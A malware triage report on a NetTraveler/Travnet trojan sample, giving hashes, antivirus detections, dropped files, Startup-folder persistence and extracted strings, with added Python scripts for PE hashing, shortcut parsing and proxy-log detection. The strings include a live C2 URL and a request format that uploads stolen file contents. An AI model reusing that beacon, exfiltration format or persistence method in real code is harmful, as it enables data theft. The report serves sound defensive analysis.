Analysis Date: 2015-12-01 21:37:08
MD5: e6a393b265caf3f6b84c1a0d2a671b9a
SHA1: 54648d75047d2cb8b7eb6fe1a9f4eeb8399821b4

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 633454e8da2cc537d4c9a5e52b963577  sha1: 5b3099cfbc0b62f9816898e2f4319e222cc95fc6  size: 233472
Section .rdata  md5: a54f46f74ec7d88c1907d4f45396073e  sha1: 1450416e3c33c080cd21e0a4f4de9039d02bc50e  size: 12288
Section .data   md5: 80aa6b709519425ce760aef9d7ed2eb6  sha1: 8300b2b574f4a2aea0197714907d29578aaa7f1d  size: 20480
Section .idata  md5: d5bf3d49c1531ba9e7076809483f33d8  sha1: 5668a282e056eb4809c1bdeedb684d602afc9d88  size: 8192
Section .rsrc   md5: 116ad736a31188e1b3a35e452dde99e3  sha1: 95f51988099333d7ee425cb111f1bbf65040ac96  size: 160768
Timestamp: 2010-04-16 02:04:25 (PE header compile stamp; it is trivially editable, and the build-path strings further down contain "\2013\Uproject", so do not date the sample from this field alone)
Pdb path: @
Packer: Microsoft Visual C++ 5.0 (a compiler signature rather than a packer; the MSVC CRT source-file names and assertion text in the Strings section are consistent with an unpacked debug-CRT build)
PEhash: 17f5d2c4cebe31b3f91020aa51e03bc0ee615489
IMPhash: d0706c5e131edbff1fdcd80995ce2b8e
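How the Section lines above are produced, as an added worked example (this is not code from the original report or from the sample's authors): each per-section md5/sha1/size is a hash of the raw on-disk section bytes, SizeOfRawData bytes at PointerToRawData, and the Timestamp line is the COFF TimeDateStamp. The script walks those headers with struct alone, so it needs no pefile, and builds a constructed minimal PE32 so it runs without the sample; build_minimal_pe, the synthetic sections and the UTC rendering of the stamp are assumptions for illustration. The sizes on this page (233472, 12288, 20480, 8192, 160768) are all multiples of 0x200, the default FileAlignment, as SizeOfRawData values should be.

```python
import datetime
import hashlib
import struct

# Added example (not part of the original report): a struct-only PE32 walker
# that reproduces the per-section md5/sha1/size lines of a triage report, plus a
# constructed minimal PE so it runs offline. The sample itself is not embedded;
# every section below is synthetic.

FILE_ALIGN = 0x200    # default FileAlignment; the report's section sizes are multiples of it
SECT_ALIGN = 0x1000
COFF_FMT = "<HHIIIHH"          # Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptHdr, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER (40 bytes)


def build_minimal_pe(sections, timestamp=0):
    """Construct a minimal PE32 image from (name, bytes) pairs. Test scaffolding only."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 0xE0                                    # PE32 optional header length
    coff = struct.pack(COFF_FMT, 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)              # Magic = PE32
    struct.pack_into("<I", opt, 32, SECT_ALIGN)        # SectionAlignment
    struct.pack_into("<I", opt, 36, FILE_ALIGN)        # FileAlignment
    headers_len = e_lfanew + 4 + len(coff) + opt_size + 40 * len(sections)
    size_of_headers = -(-headers_len // FILE_ALIGN) * FILE_ALIGN
    struct.pack_into("<I", opt, 60, size_of_headers)   # SizeOfHeaders
    table, body = bytearray(), bytearray()
    raw_ptr, va = size_of_headers, SECT_ALIGN
    for name, data in sections:
        raw_size = -(-len(data) // FILE_ALIGN) * FILE_ALIGN      # SizeOfRawData
        table += struct.pack(SECTION_FMT, name.encode("ascii"), len(data), va,
                             raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += max(-(-len(data) // SECT_ALIGN), 1) * SECT_ALIGN
    image = dos + b"PE\0\0" + coff + opt + table
    return bytes(image.ljust(size_of_headers, b"\0") + body)


def pe_section_hashes(image):
    """Return the COFF TimeDateStamp and, per section, the md5/sha1/size of the
    raw on-disk bytes (SizeOfRawData bytes at PointerToRawData), which is what
    the Section lines of the report describe."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff_off = e_lfanew + 4
    _machine, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, image, coff_off)
    sec_off = coff_off + struct.calcsize(COFF_FMT) + opt_size
    sections = []
    for i in range(nsec):
        name, _vsize, _va, raw_size, raw_ptr, *_ = struct.unpack_from(SECTION_FMT, image, sec_off + 40 * i)
        raw = image[raw_ptr:raw_ptr + raw_size]
        if len(raw) != raw_size:
            # A section table pointing past EOF means a truncated download or a
            # deliberately malformed header; say so instead of hashing a short slice.
            raise ValueError(f"section {name!r}: {raw_size} bytes claimed at 0x{raw_ptr:x}, file too short")
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "md5": hashlib.md5(raw).hexdigest(),
                         "sha1": hashlib.sha1(raw).hexdigest(),
                         "size": raw_size})
    return {"timestamp": timestamp, "sections": sections}


def timestamp_to_utc(ts):
    """Render a COFF TimeDateStamp the way the Timestamp line does (UTC assumed)."""
    return datetime.datetime.fromtimestamp(ts, tz=datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                          # real file: python pe_sections.py sample.bin
        with open(sys.argv[1], "rb") as f:
            image = f.read()
    else:                                          # constructed stand-in
        image = build_minimal_pe([(".text", b"\x55\x8b\xec\x5d\xc3" * 40),
                                  (".rdata", b"hello\0"), (".bss", b"")], timestamp=1271383465)
    info = pe_section_hashes(image)
    print("Timestamp:", timestamp_to_utc(info["timestamp"]))
    for s in info["sections"]:
        print(f"Section {s['name']:<7} md5: {s['md5']} sha1: {s['sha1']} size: {s['size']}")
```

Against a real file the output lines have the same shape as the Section lines above, which makes it easy to confirm that a sample in hand is the one the report describes even when only section hashes are shared. PEhash and IMPhash are different algorithms (hashes over section characteristics and over normalised import names respectively) and are not reproduced here.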
AV CA (E-Trust Ino): Win32/FakeFLDR_i
AV Mcafee: W32/Worm-FPG!E6A393B265CA
AV MalwareBytes: Worm.Agent.RC
AV F-Secure: Gen:Variant.Strictor.54690
AV Frisk (f-prot): no_virus
AV Twister: Trojan.093EA995FCEF8BF3
AV Eset (nod32): Win32/Agent.PWF
AV MicroWorld (escan): Gen:Variant.Strictor.54690
AV Trend Micro: TSPY_BE.7BF2119A
AV Dr. Web: Trojan.PWS.Gamania.41439
AV CAT (quickheal): Trojan.Beaugrit.r5
AV Emsisoft: Gen:Variant.Strictor.54690
AV BitDefender: Gen:Variant.Strictor.54690
AV Ad-Aware: Gen:Variant.Strictor.54690
AV Avira (antivir): TR/Crypt.CFI.Gen
AV Alwil (avast): Dropper-gen [Drp]
AV Fortinet: W32/Agent.GZLE!tr
AV Microsoft Security Essentials: Trojan:Win32/Beaugrit.gen!AAA
AV Ikarus: Trojan-Spy.Win32.Travnet
AV Kaspersky: Trojan-Downloader.Win32.Agent.gzle
AV VirusBlokAda (vba32): no_virus
AV ClamAV: Win.Trojan.Neshgaig
AV Arcabit (arcavir): Gen:Variant.Strictor.54690
AV BullGuard: Gen:Variant.Strictor.54690
AV Zillya!: Downloader.Agent.Win32.250225
AV Authentium: W32/Trojan.TZVE-7926
AV K7: Trojan ( 000cbae21 )
AV Symantec: Trojan.Travnet
AV Grisoft (avg): Downloader.Agent2.BSMJ
AV Rising: Worm.Win32.VBInjectEx.a

28 of the 30 engines listed detect the file (Frisk and VirusBlokAda report no_virus). Most names are generic; Symantec (Trojan.Travnet) and Ikarus (Trojan-Spy.Win32.Travnet) name the Travnet family, which matches the nettraveler.asp C2 path in the Strings section.

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\cmss.exe
Creates File: PIPE\wkssvc (opens the Workstation service named pipe)
Creates File: C:\Documents and Settings\Administrator\Start Menu\cmss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\RECYCLER_w\AllIndex.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\RECYCLER_w\AllIndex.ini_d
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\seruvice.lnk (a Startup-folder shortcut, i.e. per-user persistence at logon)
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\RECYCLER_w\AllIndex.ini
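What the Startup shortcut launches is the first question on a compromised host, and the report does not answer it. Below is an added example, not code from the original report or from the sample, of a minimal Shell Link (.lnk) parser that extracts the local target path and command-line arguments, plus a check against the two cmss.exe locations listed above. The constructed seruvice.lnk used for the demo is assumed to point at the Start Menu copy of cmss.exe with no arguments; that target, the cp1252 code page for ANSI strings, and helper names such as build_lnk and points_at_dropped_copy are illustration only.

```python
import struct

# Added example, not part of the original report. The report records that the
# sample writes seruvice.lnk into the user's Startup folder but not what the
# shortcut launches; this minimal Shell Link parser answers that. The .lnk built
# by build_lnk is constructed for the demo and is assumed to target the dropped
# Start Menu copy of cmss.exe; the page does not state the real target.

DROPPED_EXES = (r"local settings\temp\cmss.exe", r"start menu\cmss.exe")  # from Runtime Details

HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}


def _cstr(data, at):
    """NUL-terminated ANSI string at offset `at` (system code page assumed cp1252)."""
    return data[at:data.index(b"\0", at)].decode("cp1252", "replace")


def parse_lnk(data):
    """Return the local target path (from LinkInfo) and the StringData fields of a .lnk."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 20)
    off = 0x4C
    if flags & HAS_ID_LIST:                       # skip the PIDL; LinkInfo is enough for a local target
        (idlist_size,) = struct.unpack_from("<H", data, off)
        off += 2 + idlist_size
    target = None
    if flags & HAS_LINK_INFO:
        li = off
        size, _hdr, li_flags, _vol, base_off, _cnrl, suffix_off = struct.unpack_from("<7I", data, li)
        if li_flags & 0x1:                        # VolumeIDAndLocalBasePath: local, not network-relative
            target = _cstr(data, li + base_off) + _cstr(data, li + suffix_off)
        off = li + size
    strings = {}
    for bit, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"), (HAS_WORK_DIR, "working_dir"),
                     (HAS_ARGS, "arguments"), (HAS_ICON, "icon")):
        if flags & bit:                           # StringData: CountCharacters then the characters
            (n,) = struct.unpack_from("<H", data, off)
            off += 2
            if flags & IS_UNICODE:
                strings[key] = data[off:off + 2 * n].decode("utf-16-le")
                off += 2 * n
            else:
                strings[key] = data[off:off + n].decode("cp1252", "replace")
                off += n
    return {"target": target, **strings}


def points_at_dropped_copy(info):
    """True when the shortcut's target is one of the cmss.exe paths the report lists."""
    target = (info.get("target") or "").lower()
    return any(target.endswith(p) for p in DROPPED_EXES)


def build_lnk(local_path, arguments=None):
    """Construct a minimal .lnk with a LinkInfo local path and optional Unicode
    arguments. No VolumeID or IDList is written; real shortcuts carry both."""
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_ARGS if arguments is not None else 0)
    header = bytearray(0x4C)
    struct.pack_into("<I", header, 0, 0x4C)
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 20, flags)
    base = local_path.encode("cp1252") + b"\0"
    suffix = b"\0"                                  # empty CommonPathSuffix
    hdr_size = 0x1C
    base_off = hdr_size
    suffix_off = base_off + len(base)
    link_info = struct.pack("<7I", suffix_off + len(suffix), hdr_size, 0x1, 0, base_off, 0, suffix_off)
    out = bytes(header) + link_info + base + suffix
    if arguments is not None:
        out += struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return out


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                           # python lnk_target.py seruvice.lnk
        with open(sys.argv[1], "rb") as f:
            blob = f.read()
    else:
        blob = build_lnk(r"C:\Documents and Settings\Administrator\Start Menu\cmss.exe", arguments="")
    info = parse_lnk(blob)
    print(info, "-> dropped copy" if points_at_dropped_copy(info) else "-> other target")
```

Collect the real seruvice.lnk from the Startup folder (and the cmss.exe copies, to compare their hashes with the MD5/SHA1 at the top of the report) before the host is cleaned; the shortcut's target and arguments are also the fastest way to tell this persistence entry from a legitimate one.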

Network Details:

DNS: smtp.glbdns2.microsoft.com  Type: A  65.55.163.152
DNS: smtp.glbdns2.microsoft.com  Type: A  65.55.176.126
DNS: smtp.live.com  Type: A  (no address recorded)

The smtp.live.com lookup matches the smtp.live.com and smtp.yahoo.com strings in the binary, and the smtp.glbdns2.microsoft.com answers are consistent with that name resolving through a CNAME to Microsoft's mail front end. No SMTP session and no HTTP request to the hard-coded C2 URL appear in this capture summary.
Strings
*
0
0
_
..
00-+ 
-E-0
-0
-
-
.
] 
-e-
\
.
.
.
0
0
  
...........?-  
0
 
0
0 
0
u
!
!
.
/
/
5

Cjjj
Cjjjj
         (((((                  H
jjjj
jjjjj
jjjjjj
(null)
{{{{{{{{
{{{{{{{{{{
{{{{{{{{{{{{{
{{{{{{{{{{{{{{{{{{{
#'#'#'#'#'",
########################
									
										
													
																								
{{{{{{{{{{{{0
{{{{{{{{{{{{{0
1#QNAN
1#SNAN
''''''''''''''''@2^
\2013\Uproject(
33333333333330
3333333333333333333
%4d%2d%2d%2d%2d%2d%5s
!4JJJJ1Y^
4seCE|
$'''''''''''''''-5D
! )6PseC|(
6PY^^^^^
?}-------------+_7P^
9|$$_^]
.AAAAAAAAAAAAAAABB`:6/^^^^
{AAAAAcr7SJseC|
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/
abnormal program termination
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
a_cmp.c
ADVAPI32.dll
a_env.c
AllIndex.ini
AllIndex.ini_d
Allocation too large or negative: %u bytes.
Assertion failed: 
Assertion failed!
Assertion Failed
Assertion failed: %s, file %s, line %d
Bad memory block found at 0x%08X.
$BBBBBBBBf`:oQ8^^^
begin::
_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)
_BLOCK_TYPE(pOldBlock->nBlockUse)==_BLOCK_TYPE(nBlockUse)
.''''''''''''''''''''''''c0^
cchCount1==0 && cchCount2==1 || cchCount1==1 && cchCount2==0
C:\Documents and Settings\Administrator\
chsize.c
ch != _T('\0')
Client
client block at 0x%08X, subtype %x, %u bytes long.
Client hook allocation failure.
Client hook allocation failure at file %hs line %d.
Client hook free failure.
Client hook re-allocation failure.
Client hook re-allocation failure at file %hs line %d.
CloseHandle
cmss.exe
CoCreateInstance
CoInitialize
CompareStringA
CompareStringW
CopyFileA
CoUninitialize
CreateDirectoryA
CreateFileA
CreateProcessA
crt block at 0x%08X, subtype %x, %u bytes long.
_CrtCheckMemory()
_CrtDbgReport: String too long or IO Error
_CrtIsValidHeapPointer(pUserData)
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
 : 		%d
 : 			%d
: 		%d
'-----------------------d*^
D$0PQS
DAMAGE: after %hs block (#%d) at 0x%08X.
DAMAGE: before %hs block (#%d) at 0x%08X.
DAMAGED
DAMAGE: on top of Free block at 0x%08X.
 Data: <%s> %s
dbgdel.cpp
dbgheap.c
dbgrpt.c
DebugBreak
Debug %s!
DeleteFileA
Detected memory leaks!
DOMAIN error
D$(PSj
Dumping objects ->
),eCE|
Error: memory allocation: bad memory block type.
ExitProcess
Expression: 
failure, see the Visual C++ documentation on asserts
failure, see the Visual C++ documentation on asserts.
fclose.c
fffffffffv_74J^^^^
ffffv_Z43^^^^^
Fformat != NULL
fgetc.c
fgets.c
f		i^^
_filbuf.c
File: 
_file.c
#File Error#(%d) : 
filename != NULL
file != NULL
*file != _T('\0')
FileTimeToSystemTime
FindFirstFileA
FindNextFileA
flag == 0 || flag == 1
- floating point not loaded
_flsbuf.c
FlushFileBuffers
fopen.c
For information on how your program can cause an assertion
fprintf.c
fRealloc || (!fRealloc && pNewBlock == pOldBlock)
_freebuf.c
FreeEnvironmentStringsA
FreeEnvironmentStringsW
fscanf.c
fseek.c
ftell.c
GetACP
GetActiveWindow
_getbuf.c
GetCommandLineA
GetComputerNameA
GetCPInfo
GetCurrentProcess
GetCurrentThreadId
GetDiskFreeSpace
GetDiskFreeSpaceA
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileSize
GetFileType
GetInputState
GetLastActivePopup
GetLastError
GetLocalTime
GetLogicalDriveStringsA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTime
GetTempFileNameA
GetTempPathA
GetTickCount
GetTimeZoneInformation
GetVersion
GetVersionExA
GetVolumeInformationA
%G\JJzF
__GLOBAL_HEAP_SELECTED
`h````
HeapAlloc
_heapchk fails with _HEAPBADBEGIN.
_heapchk fails with _HEAPBADEND.
_heapchk fails with _HEAPBADNODE.
_heapchk fails with _HEAPBADPTR.
_heapchk fails with unknown return value!
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
HeapValidate
%hJJJJFH
%hs allocated at file %hs(%d).
%hs(%d) : 
%hs located at 0x%08X is %u bytes long.
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
http://www.viprambler.com/newsinfo/uld/nettraveler.asp
i386\chkesp.c
: 		%I64d
.idata
Ignore
("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)
Index.ini
input.c
InterlockedDecrement
InterlockedIncrement
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetOpenA
InternetReadFile
Invalid allocation size: %u bytes.
ioinit.c
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
?IsProcessorFeaturePresent
J<38^^^^^
J{Aff_7beC|
JalTJ3^^^^
JanFebMarAprMayJunJulAugSepOctNovDec
Ji{xxxx_Oy|
JJ(Hccccc`
JJJJJ\,hE
JJJJJJ
JJJJJJJ
JJJJJJJJ
JJJJJJJJJ
JJJJJJJJJJ^
JJseCz|(
k----------@=:64JD
kAAAAAAAAAAAActZSJ^^^^
KERNEL32
KERNEL32.dll
Largest number used: %ld bytes.
LCMapStringA
LCMapStringW
{%ld} 
%ld bytes in %ld %hs Blocks.
length<=MAX_WND_SIZE
Line: 
LoadLibraryA
localind
L=RECYCLER_w
lstrcatA
lstrcmpA
lstrcpyA
lstrlenA
MB_CUR_MAX == 1 || MB_CUR_MAX == 2
mbtowc.c
memory check error at 0x%08X = 0x%02X, should be 0x%02X.
MessageBoxA
Microsoft Visual C++ Debug Library
Microsoft Visual C++ Runtime Library
mode != NULL
*mode != _T('\0')
Module: 
MoveFileA
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
__MSVCRT_HEAP_SELECT
MultiByteToWideChar
Normal
normal block at 0x%08X, %u bytes long.
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
(null)
o|}BBBBBBBBBBBBBBBBBBBBB+]7O^
Object dump complete.
offset<MAX_WND_SIZE
o/KR^^^
ole32.dll
_open.c
osfinfo.c
output.c
OutputDebugStringA
{{{{{{{{{{{{{{{{{{{p
				P^
{{{{{{{{{{{{{p0
_pFirstBlock == pHead
_pFirstBlock == pOldBlock
pHead->nBlockUse == nBlockUse
pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
_pLastBlock == pHead
_pLastBlock == pOldBlock
pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
PostThreadMessageA
ppxxxx
Pragma: no-cache
(Press Retry to debug the application)
(Press Retry to debug the application - JIT must be enabled)
printf.c
Program: 
Program Files
<program name unknown>
Program: %s%s%s%s%s%s%s%s%s%s%s
Proxy-Connection: Keep-Alive
PRSVWh
- pure virtual function call
-------+=r,
.rdata
ReadFile
RECYCLER
RECYCLER_d
RECYCLER_u
RegCloseKey
RegOpenKeyExA
RegQueryValueExA
RtlUnwind
runtime error 
Runtime Error!
{{{{{{{{{{{{{{{{{{s
{{{{{{{{{{{{{{{{{{{s
%s?action=datasize
%s?action=getdata
%s?action=updated&hostid=%s
%s(%d) : %s
Second Chance Assertion Failed: File %s, Line %d
seruvice
\seruvice.lnk
SetConsoleCtrlHandler
SetEndOfFile
setenv.c
SetEnvironmentVariableA
SetFileAttributesA
SetFilePointer
SetHandleCount
SetStdHandle
SetUnhandledExceptionFilter
setvbuf.c
_sftbuf.c
SHELL32.dll
ShellExecuteA
%s?hostid=%s&hostname=%s&hostip=%s&filename=%s&filestart=%u&filetext=
SING error
size >= 0
smtp.live.com
smtp.yahoo.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
sprintf.c
Start Menu
Startup
stdargv.c
stdenvp.c
stream.c
stream != NULL
string != NULL
str != NULL
strupr.c
Success:
%s:UNINSTALL
SunMonTueWedThuFriSat
%s:UPLOAD
SYSTEMIF
System Volume Information
szUserMessage != NULL
TerminateProcess
=tGjyh
The value of ESP was not properly saved across a function call.  This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention. 
!This program cannot be run in DOS mode.
T$ j R
TLOSS error
Total allocations: %ld bytes.
TranIndex.ini
t.;t$$t(
;t$$wRW
t`WWWj
tzset.c
tZSJNW^^^
ulBytesCoded==ulDataLength
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
ungetc.c
UnhandledExceptionFilter
../updata.exe
\Uproject\UprojectWin32\Lz77.cpp
)\UprojectWin32\LZ7.cpp
user32.dll
USER32.dll
VC20XC00U
VirtualAlloc
VirtualFree
vsprintf.c
{{{{{{{{{{{{w
{{{{{{{{{{{{{{{{{{{w
Warning
WideCharToMultiByte
WINDOWS
WININET.dll
WriteFile
WS2_32.dll
wsprintfA
wtombenv.c
wwwwwwwwwwww
wwwwwwwwwwwwwwwwww{s
{{{{{{x
{{{{{{{{{{{{x
{{{{{{{{{{{{{{{{{{{x
xxxx@gmail.com
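The Strings section above contains the sample's whole HTTP beacon: a hard-coded URL (http://www.viprambler.com/newsinfo/uld/nettraveler.asp), three query verbs (%s?action=datasize, %s?action=getdata, %s?action=updated&hostid=%s), an upload form (%s?hostid=%s&hostname=%s&hostip=%s&filename=%s&filestart=%u&filetext=) and a fixed User-Agent (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)). The detection below is an added example, not from the original report: it scores proxy log lines against those indicators and decodes the upload form so the exfiltrated file name and chunk offset are visible. The log format and the five sample lines are constructed; hostnames other than the C2 host, client IPs, the example file name and the scoring thresholds are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example, not part of the original report. Indicators are copied verbatim
# from the Strings section: the hard-coded C2 URL, the request format strings and
# the User-Agent the sample sends.
C2_HOST = "www.viprambler.com"
C2_PATH = "/newsinfo/uld/nettraveler.asp"
C2_ACTIONS = {"datasize", "getdata", "updated"}      # "%s?action=datasize" etc.
UPLOAD_KEYS = {"hostid", "hostname", "hostip", "filename", "filestart", "filetext"}
SAMPLE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

# Constructed proxy log lines (not from the page's pcap): time client method url "user-agent"
SAMPLE_LOG = """\
2015-12-01T21:40:11Z 10.0.0.15 GET http://www.viprambler.com/newsinfo/uld/nettraveler.asp?action=updated&hostid=WS01-1234 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
2015-12-01T21:40:12Z 10.0.0.15 GET http://www.viprambler.com/newsinfo/uld/nettraveler.asp?action=datasize "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
2015-12-01T21:41:03Z 10.0.0.15 GET http://www.viprambler.com/newsinfo/uld/nettraveler.asp?hostid=WS01-1234&hostname=WS01&hostip=10.0.0.15&filename=C%3A%5Cdocs%5Cplan.doc&filestart=0&filetext=QUJDRA "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
2015-12-01T21:42:00Z 10.0.0.22 GET http://www.example.com/index.asp?action=getdata "Mozilla/5.0 (Windows NT 10.0; rv:42.0) Gecko/20100101 Firefox/42.0"
2015-12-01T21:42:30Z 10.0.0.31 GET http://intranet.example.com/report.asp?action=updated&hostid=abc "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')


def classify_request(url, ua):
    """Score one request against the beacon indicators and decode an upload form if present."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    if parts.hostname == C2_HOST and parts.path.lower() == C2_PATH:
        hits.append("c2_url")                        # the literal URL from the binary: conclusive
    if query.get("action", [""])[0] in C2_ACTIONS:
        hits.append("action_verb")                   # generic on its own
    upload = None
    if UPLOAD_KEYS.issubset(query):
        hits.append("upload_form")                   # six-field form: file contents leave in filetext
        try:
            filestart = int(query["filestart"][0])
        except ValueError:
            filestart = None
        upload = {"hostid": query["hostid"][0], "hostname": query["hostname"][0],
                  "hostip": query["hostip"][0], "filename": query["filename"][0],
                  "filestart": filestart}
    if ua == SAMPLE_UA:
        hits.append("sample_ua")                     # an IE6/Windows 2000 UA; weak alone
    if "c2_url" in hits:
        verdict = "malicious"
    elif "upload_form" in hits or {"action_verb", "sample_ua"} <= set(hits):
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "hits": hits, "upload": upload}


def scan_log(text):
    """Parse the constructed log format and classify every well-formed line."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                                  # unparseable line; a real pipeline would count these
        r = classify_request(m["url"], m["ua"])
        r.update(ts=m["ts"], client=m["client"])
        results.append(r)
    return results


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r["ts"], r["client"], r["verdict"], ",".join(r["hits"]), r["upload"] or "")
```

The hard-coded URL alone is conclusive, so it rates malicious; the query-verb and User-Agent patterns are generic enough that either alone stays clean and only the combination is suspicious. The upload form is the part worth alerting on: filestart is a byte offset, so a file larger than one request shows up as a run of uploads with the same filename and increasing filestart. The smtp.live.com and smtp.yahoo.com strings, the xxxx@gmail.com placeholder and the smtp.live.com lookup under Network Details point to a mail channel that this HTTP rule does not cover.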